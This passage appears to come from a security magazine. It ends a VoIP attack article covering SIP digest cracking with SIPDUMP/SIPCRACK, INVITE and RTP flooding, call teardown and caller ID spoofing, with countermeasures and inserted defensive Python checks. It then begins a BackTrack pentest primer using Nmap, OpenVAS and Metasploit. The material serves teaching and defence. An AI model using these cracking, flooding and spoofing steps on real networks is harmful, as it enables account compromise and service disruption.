obtain the SIP authentication header with a Network Analyzer and perform a dictionary or brute-force attack.
In the following, two examples of Authentication Attacks are reported; the author's choice of tool
is SIPCRACK (but SIPVICIOUS could be used again, with a tool called SVCRACK). Before showing how to
crack a SIP authentication password, the author must introduce another tool belonging to the SIPCRACK suite,
called SIPDUMP. SIPDUMP's purpose is to extract the MD5 authentication challenge values from a SIP session
and write them into a separate file; in order to do this it can work either in batch mode (with a pre-
recorded .pcap file) or in on-line mode (by means of a MITM attack in progress).
Figure 12 reports a usage example of SIPDUMP; in this case the MD5 values were obtained from a
trace file (.pcap) recorded during a previous MITM attack. The trace was obtained from a call between UAC#1
and UAC#2, in particular UAC#2 calling UAC#1 (which runs on the same network device as the UAS,
but this does not imply a loss of generality). As you can see in the picture, the MD5 values are stored
in a file called hash.txt, whose content is reported in Figure 13. Since UAC#2 is calling UAC#1, the victim
of this Authentication Attack will be UAC#2. Now the file hash.txt can be used to crack the
authentication password by means of the SIPCRACK tool.
Let us start with a Dictionary Attack; it is performed by comparing the MD5 value of each password
in a password list with the MD5 value selected from the file hash.txt. Figure 14 shows an
example of this attack executed by means of a password dictionary, called ps.txt, which contains more than
two million alphanumeric passwords; as you can see in the picture, the author has selected the first MD5
value, belonging to the SIP INVITE Request Message, and the software has correctly cracked the password in
just 2 seconds.
Figure 14. Dictionary Attack with SIPCRACK
Figure 15. Brute-Force Attack with SIPCRACK
Finally, let us have a look at how the second Authentication Attack, called Brute Force, is accomplished.
Its name derives from the fact that it tries every possible combination of alphanumeric characters in order to
discover the correct password. An auxiliary tool called JOHN THE RIPPER is used to generate the
candidate passwords. Figure 15 shows the attack: as you can see at the top of the picture, the author has first
created a FIFO pipe called j2s and used it as the carrier to pass the passwords generated
by JOHN THE RIPPER (which generates alphanumeric passwords with a maximum length of 8 characters) to
SIPCRACK. Since SIPCRACK has already cracked the first MD5 value stored in hash.txt during the previous
attack, the target can only be the second MD5 value, belonging to the BYE Request Message. The author
interrupted the attack for the sake of brevity, since this kind of attack can take a long time, hours or even days.
One countermeasure that a network administrator could take into account is to use strong passwords, but
the only real countermeasure that completely avoids this kind of threat is to employ a Public Key
Infrastructure between UAS and UAC.
Denial of Service (DoS) Attack
A Denial of Service (DoS) attack on a VoIP network can render it useless by damaging the system's
availability; it is one of the most dangerous attacks, since VoIP endpoints are often not equipped to protect
themselves against it. Generally DoS attacks send a lot of data (invalid or broken packets), flooding the
network in order to consume device resources, which could be physical (CPU usage) or logical (exploitation
of protocol features), and overwhelm the device with a lot of requests while it processes those packets. At the
same time valid packets do not reach the system, resulting in interrupted conversations and halted call
processing, because VoIP uses complex protocols for communication and even small delays in processing
packets can cause serious damage to conversations. There are several basic types of DoS attack
that occur over IP networks.
1. Flood DoS: an attacker launches a very large number of packets at a victim device, which gets busy
processing malicious packets while dropping or delaying legitimate packets. This attack can be performed as
a Distributed DoS (DDoS), where multiple systems are used to generate a massive flood of packets;
2. Implementation flaw DoS: an attacker creates malformed packets (they could be very long or syntactically
incorrect) in order to cause the target to fail;
3. Application-level DoS: manipulates features of the VoIP service in order to create an attack (for example,
hijacking the registration of an IP phone causes the loss of any inbound calls to that phone);
4. Platform DoS: an attacker creates a DoS by targeting a critical underlying support service (for example a
flaw in a network protocol implementation of the target OS).
The INVITEFLOOD tool can be used to flood a target with INVITE Request Messages; it can be used against
both a UAS and a UAC. As long as the tool keeps flooding the PBX it prevents users from making phone calls.
Figure 16 reports an attack accomplished by the author with this tool; the number of INVITE packets was
set to 100 in order to flood the victim. While the attack is in progress the victim device is unusable, since it
needs significantly longer to establish a connection. Moreover, the PBX can be flooded with a non-existent
extension, making it generate a 404 Not Found just to keep it busy. Figure 17 reports the packets received by
the victim, again recorded by means of Wireshark; you can see the large number of INVITE Request
Messages sent to the victim.
Figure 16. DoS with INVITEFLOOD
Figure 17. DoS packets registration
Figure 18. RTPFLOOD help command
Figure 19. TEARDOWN help command
RTPFLOOD is another tool used to flood a victim with UDP packets containing RTP data. In order to obtain
a successful attack using RTPFLOOD, you need to know the RTP listening port used by the victim device
(for example the X-Lite softphone's default UDP port is 8000). Figure 18 reports the RTPFLOOD help output.
TEARDOWN is a tool used to terminate a call by sending a BYE Request Message; before using
TEARDOWN you must capture a valid SIP OK Response Message in order to use its From and To
tags and a valid caller ID value. Figure 19 reports the help output of TEARDOWN.
In order to avoid DoS attacks, a network administrator can introduce a logical network partitioning called
Voice VLAN. The basic concept behind the Voice VLAN is to dedicate a separate VLAN with a
separate subnet to voice traffic; this keeps contention between data and voice to a minimum and is easier
to manage. Another solution could be stateful firewalls with application inspection capabilities, policy
enforcement to limit flooding packets, and out-of-band management that allows the network
administrator to react to network events at the moment of the attack by means of network monitoring.
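One piece of the policy enforcement just mentioned can be done from the signalling log. The following Python example is added here and is not code from the article or from any product: it keeps a sliding one-second window of INVITE requests per source address and reports sources that exceed a limit, counting separately the INVITEs answered with 404 (the non-existent-extension flood described above). The log line format, the limits and the sample traffic (100 INVITEs in one second from the test plant's attacker address, plus three normal calls from UAC #2) are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (an assumption of this example):
# "<ISO timestamp> <source IP> <method> <request URI> <final status code>"
LINE_RE = re.compile(r"^(\S+) (\d+\.\d+\.\d+\.\d+) ([A-Z]+) (\S+) (\d{3})$")
EPOCH = datetime(1970, 1, 1)


def detect_invite_flood(lines, window=1.0, invite_limit=20, notfound_limit=10):
    """Sliding-window rate check per source address: too many INVITEs within
    `window` seconds, or too many INVITEs answered 404 (a flood aimed at an
    extension that does not exist). Lines must be in time order per source.
    Returns {source: {"invites": n, "not_found": n}} holding the peak window
    counts of every source that crossed a limit."""
    recent = defaultdict(lambda: {"invites": deque(), "not_found": deque()})
    peaks = defaultdict(lambda: {"invites": 0, "not_found": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                                  # not a line in our format
        stamp, src, method, _uri, status = m.groups()
        if method != "INVITE":
            continue
        t = (datetime.fromisoformat(stamp) - EPOCH).total_seconds()
        buckets = ["invites"] + (["not_found"] if status == "404" else [])
        for name in buckets:
            dq = recent[src][name]
            dq.append(t)
            while dq and t - dq[0] > window:          # drop entries outside the window
                dq.popleft()
            peaks[src][name] = max(peaks[src][name], len(dq))
    limits = {"invites": invite_limit, "not_found": notfound_limit}
    return {src: counts for src, counts in peaks.items()
            if any(counts[k] > limits[k] for k in limits)}


def sample_log():
    """Constructed traffic: 100 INVITEs in one second from the attacker address of
    the test plant, all to a non-existent extension (answered 404), plus three
    normal calls from UAC #2 spaced 15 seconds apart."""
    base = datetime(2013, 10, 1, 10, 0, 0)
    lines = []
    for k in range(100):
        t = base + timedelta(milliseconds=10 * k)
        lines.append(f"{t.isoformat(timespec='milliseconds')} 192.168.101.191 "
                     f"INVITE sip:9999@192.168.101.105 404")
    for k in range(3):
        t = base + timedelta(seconds=15 * k)
        lines.append(f"{t.isoformat(timespec='milliseconds')} 192.168.101.190 "
                     f"INVITE sip:1000@192.168.101.105 200")
    return lines


if __name__ == "__main__":
    for src, counts in detect_invite_flood(sample_log()).items():
        print(f"flood from {src}: {counts}")
```

The two counters answer different questions: the INVITE rate catches a raw flood whatever extension it targets, while the 404 rate stays low for legitimate callers and rises only when someone keeps the PBX busy answering for extensions that do not exist, so it is the safer trigger for an automatic block.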
Spoofing Caller ID
The caller ID is fairly easy to spoof in SIP: you just need to change the From header of the SIP INVITE
Request Message. In order to spoof the caller ID several tools can be used, for example SVWAR, a tool already
used in a previous section and belonging to the SIPVICIOUS suite. The author's choice for this attack is again
INVITEFLOOD, but in this example it is not used to flood the VoIP phone but to fake the Caller
ID. Figure 20 shows this kind of attack; as you can see in the picture, INVITEFLOOD sends one INVITE
Request Message to the victim in order to spoof a Caller ID (-a spoofed), making the victim's phone
ring. Figure 21 reports the spoofed caller ID displayed as the Incoming Call by X-Lite.
Figure 20. Caller ID spoofing with INVITEFLOOD
Figure 22 finally shows the Message Header of the packet captured by Wireshark; as you can see, spoofed
is the fake Caller ID reported in the Message Header, and in this way the wrong information hides the original
caller's information and might mislead the receiver.
Figure 21. X-Lite rings displaying a spoofed ID
Figure 22. Spoofed SIP INVITE
The only countermeasures that are effective involve authentication of the sender and/or the From: header.
When coupled with the use of Public Key Infrastructures between UAS and UAC, digest authentication can
be used securely to authenticate the UAC. This approach enhances authentication, but only provides hop-by-
hop security, and it breaks down if any participating proxy does not support Public Key Infrastructures and/
or cannot be trusted.
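A proxy-side version of the countermeasure just described, as an added example that is not taken from the article or from any tool it names: digest authentication of the UAC, followed by a check that the From: identity belongs to the authenticated account, run against constructed INVITEs including one carrying the same "spoofed" caller ID the INVITEFLOOD example uses. Realm, accounts, nonce and hosts are invented.

```python
"""Proxy-side check tying the SIP From: header to an authenticated account.

Added example, not code from the article or from any tool it names. The article
shows that From: can carry any caller ID (INVITEFLOOD -a spoofed) and that the
effective countermeasure is authenticating the sender and the From: identity.
This does both for constructed INVITEs: verify the RFC 3261 digest (MD5, as in
RFC 2617, no qop) and then refuse the request when the From: URI is not one the
authenticated account may assert. Realm, accounts, nonce and hosts are invented.
"""
import hashlib
import re

REALM = "voip.example.com"
# Constructed account store: username -> (password, URIs the account may present as caller ID)
ACCOUNTS = {"1001": ("s3cret-1001", {"sip:1001@voip.example.com"})}


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, password, method, uri, nonce):
    """RFC 2617 response without qop: MD5(HA1 ":" nonce ":" HA2)."""
    ha1 = _md5(f"{username}:{REALM}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_request(raw):
    """Return (method, request_uri, headers) for a SIP request; header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, request_uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, request_uri, headers


def parse_digest(value):
    """Turn 'Digest username="1001", realm="...", ...' into a dict."""
    if not value.startswith("Digest "):
        return {}
    pairs = re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', value[len("Digest "):])
    return {key: quoted if quoted else bare for key, quoted, bare in pairs}


def uri_in_from(from_header):
    """Extract the bare URI from '"Name" <sip:user@host>;tag=...'."""
    match = re.search(r"<([^>]+)>", from_header)
    uri = match.group(1) if match else from_header
    return uri.split(";")[0].strip()


def check_invite(raw):
    """Return (accepted, reason): accept only an authenticated INVITE whose From: matches the account."""
    method, _request_uri, headers = parse_request(raw)
    if method != "INVITE":
        return False, "not an INVITE"
    auth = parse_digest(headers.get("authorization", ""))
    user = auth.get("username")
    if user not in ACCOUNTS or auth.get("realm") != REALM:
        return False, "401 Unauthorized: no usable credentials"
    password, allowed_uris = ACCOUNTS[user]
    expected = digest_response(user, password, method, auth.get("uri", ""), auth.get("nonce", ""))
    if expected != auth.get("response"):
        return False, "403 Forbidden: digest does not verify"
    # Authentication passed; now bind the asserted caller ID to the account.
    asserted = uri_in_from(headers.get("from", ""))
    if asserted not in allowed_uris:
        return False, f"403 Forbidden: From {asserted} is not owned by account {user}"
    return True, f"accepted: account {user} calling as {asserted}"


def build_invite(from_uri, display, username, password, nonce="constructed-nonce-1"):
    """Constructed INVITE with a valid digest for `username` and an arbitrary From: identity."""
    request_uri = "sip:2002@voip.example.com"
    response = digest_response(username, password, "INVITE", request_uri, nonce)
    return (
        f"INVITE {request_uri} SIP/2.0\r\n"
        f'From: "{display}" <{from_uri}>;tag=1928301774\r\n'
        f"To: <{request_uri}>\r\n"
        "Call-ID: a84b4c76e66710@192.168.1.115\r\n"
        "CSeq: 314159 INVITE\r\n"
        f'Authorization: Digest username="{username}", realm="{REALM}", nonce="{nonce}", '
        f'uri="{request_uri}", response="{response}"\r\n'
        "Content-Length: 0\r\n\r\n"
    )


# Legitimate call: the account presents its own identity.
LEGIT = build_invite("sip:1001@voip.example.com", "1001", "1001", "s3cret-1001")
# The article's attack: a valid account, but From: claims to be "spoofed".
SPOOFED = build_invite("sip:spoofed@voip.example.com", "spoofed", "1001", "s3cret-1001")
# Wrong password: the digest fails before the From: check is reached.
BAD_PASSWORD = build_invite("sip:1001@voip.example.com", "1001", "1001", "wrong")

if __name__ == "__main__":
    for label, message in (("legit", LEGIT), ("spoofed", SPOOFED), ("bad password", BAD_PASSWORD)):
        print(f"{label:12s} -> {check_invite(message)}")
```

The check is only as strong as the hop it runs on: a From: that a trusted upstream proxy already rewrote has to be verified there, which is the hop-by-hop limitation noted above.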
Conclusions
The aim of this article was to develop an overview of a reliable VoIP hacking methodology that could be used against a VoIP network. Attack vectors including Information Gathering, Extension Enumeration, Eavesdropping, Telephone Tampering, Authentication Attacks, Denial of Service and Identity Spoofing are reported and explained by means of real examples carried out with the embedded tools. Moreover, the countermeasures reported in this article should be used by system administrators, penetration testers and network engineers to mitigate the possible security threats.
On the Web
http://www.ietf.org/rfc/rfc3550.txt RTP Request For Comment
http://www.ietf.org/rfc/rfc3261.txt SIP Request for Comment
https://www.ietf.org/rfc/rfc3711.txt SRTP Request for Comment
http://www.asterisk.org/ Asterisk PBX website
http://www.x-lite.it/ X-Lite SoftPhone website
http://www.zoiper.com/ Zoiper website
http://www.wireshark.org/ Wireshark website
http://blog.sipvicious.org/ SIPvicious Blog
http://www.openwall.com/john/ John The Ripper web page
About the Author
Mirko Raimondi obtained his Master's degree in Computer Science from the University of Milan Computer Science Department. He worked as a Software Engineer at ITALTEL, an Italian leading company in the telecommunications industry, where he was the project leader of Netmatch-S Lite Edition, a VoIP Session Border Controller based on a virtual platform and running on commercial hardware. In the ITALTEL test plant he built testing scenarios by means of Cisco L2/L3 devices, and he has a CCNA Security in progress. Currently he works in the automotive industry, where he has realized an audio/video/metadata multiplexer in order to hide GPS data in mov files. He's interested in VoIP telecommunications, network security, steganography methods and computer forensics. You can contact him either through LinkedIn: http://it.linkedin.com/pub/mirko-raimondi/14/182/58a or via e-mail: web.mirk@gmail.com.
A Crash Course in Pentesting with Backtrack
by Nick Hensley
In this article, we will give you a crash course in pentesting. This article is meant to be a basis, or primer if you wish; it will teach you what a penetration test is and what it is not. We will show you the basic steps that go into virtually all penetration tests, and teach you what you need to be aware of, what to look for, and how to get started. That being said, this is not a how-to-hack article that will teach you how to break into some unsuspecting company's website and further penetrate their internal infrastructure.
There are many who consider obtaining Domain Admin the ultimate goal. And yes, it is definitely a cool thing to do, BUT it's not the only thing one should try to accomplish when performing a penetration test. Within most companies there exist a large number of systems and devices that are not members of the Domain. There are many vectors and avenues of attack that malicious individuals will use in order to gain access to your network; some of these include using SQL injection techniques on your company's main website, probing for misconfigured applications and services, brute-forcing, utilizing default username/password combinations, and Social Engineering, to name a few.
What most attackers are going to do is look for the low-hanging fruit, which can really run the gamut from the aforementioned default username/password combination to unpatched servers with common exploits. I think it was on my very first pentest (long before Metasploit was ever dreamed up) when I asked my mentor "where do I start?" and he replied "find the oldest thing you can on the network and go after it."
That being said, what is it that your company or client wants to get out of the pentest? That's actually the second question I ask clients when initially engaging with them prior to beginning a test. But the real answer is that they want an actionable report! What the client needs is a report showing what you did, how you were able to accomplish the exploitation, and remediation information. During a test you will often be able to exploit one system, which may lead to another system and then to another, entirely different subnet.
The most important thing that you need before you begin a penetration test is a signed agreement between
you and the client outlining the scope, time frame, and most importantly, the signature of a person who has
the AUTHORITY to give you permission to attack their network.
And don't forget that if anything happens during a penetration test that's even IT related at all, someone is going to come looking for you or your phone is going to start ringing. I've even received calls with someone asking "What are you doing?" because some server crashed before I had even fired up my laptop for the day! Penetration testing can create a lot of network traffic and the pentester, being the wild card, will catch the blame, so timing the pentest can be critical.
Defining the Scope of the Test and Getting Permission
I use a form when I engage with clients. The form explains the methodology I'll be using and has places where they can fill in information specifying what they want tested and what they don't want tested, along with special-attention targets and check boxes for some items. Speaking of methodology, if you are new to penetration testing or thinking about getting into it, I would recommend checking out the Open Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project (OWASP), which can be found at their respective links:
OSSTMM: http://www.isecom.org/research/osstmm.html
OWASP: https://www.owasp.org/index.php/OWASP_Testing_Project
Note
OWASP is actually in the process of updating to v4 and has a draft available on their site.
Your agreement will no doubt look different from the ones I have used, and it will be a living document that changes over time. At a minimum I would suggest including the following in any agreement between you and your client:
Start and End Date
Times the Testing can take place
List of internal contacts
Your contact information
List of Targets
Special Attention Targets
Targets to Exclude
Type of Testing to be Performed along with the Depth of the Engagement
If they want you to perform Denial of Service attacks, a space to justify it
A Disclaimer about the Possibility of Bringing Down a System(s) or Service(s)
A place for them to release you from damages that may occur
Signature of the Approver and his/her Title
Often when first engaged, clients won't have any idea what their options are and in some cases what they even want tested. So I will explain to them what I can do, and describe the different attack vectors and avenues a malicious person can and will use to try to gain access to their infrastructure. This can take some time and will usually be very back-and-forth between you and your client, with both sides asking and answering questions.
The first real question I ask is "What is your primary concern, that is, what are you most concerned with, or where do you think you have the most risk?" Their answer to this question will help you guide them throughout the rest of the conversation. Some clients may have just had a breach from the outside, others may have installed some new piece of network hardware and noticed they have a lot of outbound connections to countries their employees should have no business need to access, and yet others only want a test to satisfy compliance. Depending on their answer, I will usually make a recommendation and have them agree that my recommendation is indeed what they are asking/looking for. Sometimes it will depend on what they have had tested in the past. If it's a new client, or one that hasn't had a true penetration test in a while, I will suggest that the test utilize a three-pronged approach, and recommend at a minimum that the testing focus on the external (from the Internet), internal (user space and server), and web applications (both Internet accessible and internal).
At times I will have clients say something like "Well, we're not really worried about internal"; this is when I explain to them what happens when someone spoofs an email from the CEO and sends a malicious PDF file to their Domain Admin that creates an outbound connection to the attacker's laptop, so that the attacker then has a direct tunnel into their internal network, and ask what happens if he installs a key-logger on that admin's machine?
Again the main point here is that the conversation will go back-and-forth and sometimes may involve multiple
conference calls with different people before they decide on what they want tested, and you may have to
explain and give examples about what the attacker is capable of. At the end of the day you are working for the
client, and will want to provide them with the best course of action given their specific needs. The ultimate goal
is to agree upon what is to be done, and have the appropriate person sign off on what you are about to do.
Preparing your Attack Platform
Assuming you now have the legal authority to perform a penetration test against someone's network, you will need the proper tools!
For the rest of this article I will talk about some of the most common tools that nearly every penetration tester uses. I may not go into detail on all of these due to scope, but this section should get you set up, give you the basics, and point you to some things that you can follow up on. Everything I am about to show you should be something you can replicate on your own personal home network. For that reason I will try to focus strictly on free and open source tools.
As most corporate infrastructures are a heterogeneous mix of network devices and operating systems all
running different services and at different patch levels, I recommend using at least two different operating
systems. Your first operating system should be a Windows OS, and your second a Linux distribution.
When anybody asks me how they should set up their attack platform, I usually recommend running these on the same machine: a Windows OS (I'm partial to Windows 7 Pro 64-bit) as the main install, and then a Linux VM. Over the years there have been many Linux-based distributions released; some made for graphic artists, video editing, and penetration testing. The main distro that you will see many penetration testers using, and the one you will most easily find information on, is BackTrack, and that's what we will be using.
BackTrack's website www.backtrack-linux.org defines the distro as follows: "BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless of whether you install BackTrack, boot it from a Live DVD or thumb drive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester."
Figure 1. BackTrack download
Installing Backtrack
I'll start out by assuming you have a Windows machine. The first thing you will need is a way to run the BackTrack VM. If you don't already have it, head over to VMware's website and download VMware Player; it's free for personal non-commercial use: http://www.vmware.com/products/player/. VMware Player's installation is very straightforward so I won't cover it here. Next you need to download the BackTrack VM from http://www.backtrack-linux.org/downloads/. There are many different versions and options you can pick when downloading; just make sure you set your options as follows, since we will be downloading the latest BackTrack 5 R3: Figure 1.
BackTrack decided to use 7zip to compress their file, so if you have an issue extracting the archive you can download 7zip from http://www.7-zip.org/ and use it to extract the VM. Once you have everything downloaded, installed, and extracted, go ahead and launch VMware Player. The first thing you will need to do before you play the BackTrack VM is to change a setting or two. Click on "Edit virtual machine settings"; on the right, select Network Adapter and then, on the left, change the Network Adapter connection type from NAT to Bridged and click the Save button so that it looks like this: Figure 2.
Figure 2. Bridged
Note
The BackTrack virtual machine comes set for 768 MB of RAM. Depending on the total amount of RAM you have available on your system you may want to increase that!
Now go ahead and start the BackTrack virtual machine by clicking on "Play virtual machine". The first time you start up any virtual machine you have downloaded or moved from machine to machine, VMware Player will ask you a question; select the "I copied it" button (Figure 3).
Figure 3. I copied it
When the VM first starts up, if you have any USB or other devices connected it will prompt you with another message letting you know that you can connect those devices to the virtual machine; you do not want to do that here.
Once the BackTrack VM has finished booting you will see a login prompt like this: Figure 4. The default
login is root and the password is toor.
Figure 4. Login
Once you are at the prompt, go ahead and make sure you have an IP address by typing:
ifconfig
You should see that your DHCP server has handed you an IP address on your local network, if you see
something other than the right subnet for your network, you need to go back and check that you are running
in Bridged mode and not NAT. While things will work with a NATted IP address, if you are trying to exploit
a machine on a real subnet you will have to make changes to your host to pass the traffic back-and-forth.
The output from the ifconfig command should look like this: Figure 5. Next start up the window manager with the command:
startx
Figure 5. Ifconfig command output
Then launch the Terminal application by clicking on the icon at the top left of the screen that looks like a
little black box with >_ inside of it (Figure 6).
Figure 6. Metasploit registration
This next step will take a while, but we will make sure everything is up to date, and we want to install the new version of Metasploit, so issue the following commands; when asked if you want to uninstall Metasploit click the Yes button: Listing 1.
Listing 1. Uninstall Metasploit
cd /opt/metasploit
./uninstall
apt-get update
apt-get upgrade -y
cd ~
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod +x metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run --prefix /opt/metasploit --mode unattended
nmap --script-updatedb
With the new version of Metasploit you will need to register in order to get updates.
If you want to register open up a browser and go to https://localhost:3790.
You will see the following screen (Figure 7); click the GET PRODUCT KEY button (Figure 8).
Figure 7. Metasploit registration
Figure 8. Getting the Product Key
Next pick which version you want, Pro or Community (I recommend the Community edition, otherwise Pro will only work for 7 days), then type in all your information to get your free license key! (Figure 9)
Figure 9. Free Licence Key
Note
BackTrack comes with a lot of plugins for Firefox, you may need to disable these in order to register!
After you have filled out their form click on the GET FREE LICENSE button.
Once you have registered, update Metasploit by typing at the command prompt:
msfupdate
Host Discovery and Enumeration
Now we are ready to identify live hosts on our test/home network. As you saw earlier, our IP was
192.168.1.115. So that means our home subnet will be 192.168.1.0/24 and for this we will be using Nmap.
Nmap
Nmap (or Network Mapper) is a security scanner that provides many features for probing computer networks, such as host discovery, service detection, operating system fingerprinting, and a whole lot more. Nmap is very powerful and has a ton of options; you can read more about it and all its various options at http://nmap.org. A full reference of all the switches for Nmap can be found at http://nmap.org/book/man.html. Here I will show a few Nmap commands that will help ease your way.
The first command we are going to run will get us a list of all the live hosts on our network and output those to a file. You could skip this step and simply run the next Nmap command, but it would take a whole lot longer! We also want to exclude our attack platform, so you will need to know the IP address of your BackTrack virtual machine along with the IP of your Windows host OS (and any other hosts you don't want to scan). When the command completes you will have a live_hosts.txt file; let's check it to see what hosts you found on your network (Figure 10).
nmap -sn -T5 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.115,192.168.1.117 \
  | grep "Nmap scan" | cut -d " " -f5 > live_hosts.txt
cat live_hosts.txt
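The grep/cut pipeline above takes the fifth field of each "Nmap scan report" line, which is the IP address only while reverse DNS does not resolve. The following added example (not from the article) extracts the address itself and shows the difference on constructed output; its exclude list is a post-filter standing in for --exclude.

```python
"""Pull live-host addresses out of Nmap normal output without losing resolved hosts.

Added example, not code from the article. The article's pipeline
(grep "Nmap scan" | cut -d " " -f5) keeps the fifth space-separated field of each
"Nmap scan report for ..." line. That is the address only when reverse DNS fails;
when it resolves, the line reads "Nmap scan report for name (ip)", field 5 is the
hostname, and the host silently drops out of live_hosts.txt and every later scan.
Matching the address itself avoids that. The sample output below is constructed.
"""
import ipaddress
import re

# Constructed `nmap -sn` output: one host resolves via reverse DNS, two do not.
SAMPLE_OUTPUT = """\
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-10 10:00 CET
Nmap scan report for router.lan (192.168.1.1)
Host is up (0.0010s latency).
Nmap scan report for 192.168.1.115
Host is up (0.00020s latency).
Nmap scan report for 192.168.1.197
Host is up (0.0040s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""

# Either "for 192.168.1.197" or "for name (192.168.1.1)"; the address is group 1.
REPORT_LINE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")


def live_hosts(nmap_output, exclude=()):
    """Return the IPv4 addresses Nmap reported, in order, minus the excluded ones."""
    excluded = {str(ipaddress.ip_address(addr)) for addr in exclude}
    hosts = []
    for line in nmap_output.splitlines():
        match = REPORT_LINE.match(line.strip())
        if not match:
            continue
        try:
            ip = str(ipaddress.ip_address(match.group(1)))
        except ValueError:
            continue  # malformed address (e.g. 999.1.1.1): skip rather than feed it to later scans
        if ip not in excluded and ip not in hosts:
            hosts.append(ip)
    return hosts


def naive_cut_f5(nmap_output):
    """Python mirror of the article's `grep "Nmap scan" | cut -d " " -f5`, for comparison."""
    return [line.split(" ")[4] for line in nmap_output.splitlines() if "Nmap scan" in line]


if __name__ == "__main__":
    # The attack platform (192.168.1.115) is excluded, as in the article; the router stays in.
    print("cut -f5:", naive_cut_f5(SAMPLE_OUTPUT))
    print("parsed :", live_hosts(SAMPLE_OUTPUT, exclude=["192.168.1.115"]))
```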
Figure 10. Nmap hosts
Now we have a nice list of all the hosts on our network that are live. We need to scan all these hosts, enumerate the ports, check services and versions, and run some of the built-in Nmap scripts, which will give us a good idea of what we're up against. If you're curious about all these options you can simply type nmap at the command prompt and it will tell you what each option does.
nmap -vv -Pn -sS -p1-65535 -sV -sC
--script-args=unsafe=1 -O -iL live_hosts.txt -oA my_subnet
Note
I added the --script-args=unsafe=1 option (you didn't used to have to do this, but with the newer versions of Nmap you otherwise miss quite a bit of exploitable goodness; if you are unsure, you can leave that option out).
Once Nmap fires off, you should see something that looks like this appear in your terminal: Figure 11.
Figure 11. Nmap terminal
Vulnerability Scanning
Next up you will need to identify whether any of these hosts contain vulnerabilities. Vulnerability scanners are another class of tool that any pentester can use to quickly identify hosts which may be vulnerable to exploitation. Usually I would start with a vulnerability scanner like Nessus or Core Impact, and then run an Nmap scan. But for the workflow here, wanting to give you the ability to use BackTrack with only free tools so that you can replicate this in your test or home environment, we will be using OpenVAS.
Nessus
Nessus does have a free-for-home-use license and, while I suggest you install it and give it a try, it is limited in the number of IP addresses that you can scan. The full version basically has no limitations and for the price can't be beat. Nessus can be found at Tenable's website and can be downloaded from http://www.tenable.com/products/nessus. Nessus currently has over 50,000 checks for vulnerabilities and you can also add in credentials (if known) for an even deeper analysis.
OpenVAS
There are a few open source, free vulnerability scanners out there; among them is OpenVAS, which can be found at http://www.openvas.org/. OpenVAS currently has over 30,000 checks, so you get what you pay for. Another reason we are talking about OpenVAS is that it comes installed on BackTrack. But it does require a few steps to get it up and running.
So let's get OpenVAS set up and configured. Some of these commands will require user input, for instance the setup of the SSL certificate (but you can just hit Enter on all the prompts), and when creating the Admin user you will be asked to input a password (Listing 2).
Listing 2. OpenVAS
cd /pentest/misc/openvas
openvas-mkcert
openvas-mkcert-client -n om -i
openvasad -c add_user -n admin -r Admin
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Now that you have configured OpenVAS, open your browser (Firefox) and surf over to 127.0.0.1:9392 and you will see the default login screen; go ahead and enter admin for the Username (the user we created above) and the Password you typed in. The default login screen will look like this (Figure 12).
Figure 12. Openvas login
Once you login you will see the main page which looks like this (Figure 13).
Figure 13. Openvas Main Page
On the left hand menu click on Target and add your subnet then click Create Target (Figure 14).
Figure 14. Create Target
Next click on New Task and pick a name for your task, select the target (mine) which we just created from the drop-down list and select the Scan Config you wish to use; we will use "Full and Fast". Then click the Create Task button and you should see that it was set up correctly (Figure 15).
Figure 15. Tasks
Then click the triangle Play Button icon (if you mouse over it, it will say Start Task) on the right-hand side and your scan will begin. Once the scan has finished the status will show as Done. Be aware that the scan can take a long time, so be patient; you may not see the status bar update for a while, as OpenVAS is very processor and memory heavy (Figure 16).
Figure 16. Start Task
Click on the magnifying glass icon to view the details of your report (Figure 17).
Figure 17. See the details
On the next screen click on the magnifying glass icon again for the details of your scan. If you scroll down, you will see the vulnerabilities that were identified for each host (in this example MS09-001); you can then check Metasploit using the search function for any modules relating to this vulnerability (Figure 18).
Figure 18. Vulnerability check
Metasploit
The Metasploit Project was created by HD Moore and is a project which provides information about security vulnerabilities and aids penetration testing; it's best known for its open-source Metasploit Framework, a tool for developing and executing exploit code. When your Nmap scan has completed, let's go ahead and load the data into Metasploit. We will first launch Metasploit, then create and connect to a new workspace to work with, load the Nmap scan results, and verify things completed with the hosts command (Listing 3 and Figure 19).
Listing 3. Hosts command
msfconsole
workspace -a my_network
workspace my_network
db_import /root/my_subnet.xml
hosts
Figure 19. Hosts_load
Note
If at any time you need help in Metasploit you can issue the help command, also each command usually will
take the -h option, for example, hosts -h.
A shortcut to running Nmap from the command line is to actually run it from within Metasploit itself; however, I like to run Nmap from the command line with the -oA switch, which outputs in the three major formats at once. This can be incredibly useful if you need to grep through the Nmap output or otherwise sort through it and use that information with other tools. You can, however, issue all the same commands from within Metasploit; at the command prompt you simply type db_nmap instead of the nmap command line we just finished.
Metasploit has a LOT of different auxiliary modules and tons of commands, but for this article we obviously can't cover them all. We will, however, hit on some of the major commands and give you an understanding of how to use the tool and some of the most common things you will be doing inside the Metasploit console. With that in mind, let's take a look at what services Nmap found that we have imported.
services
As you can see, Nmap did a really good job of identifying the open ports and what services and versions are
running on those ports (Figure 20).
Figure 20. Services
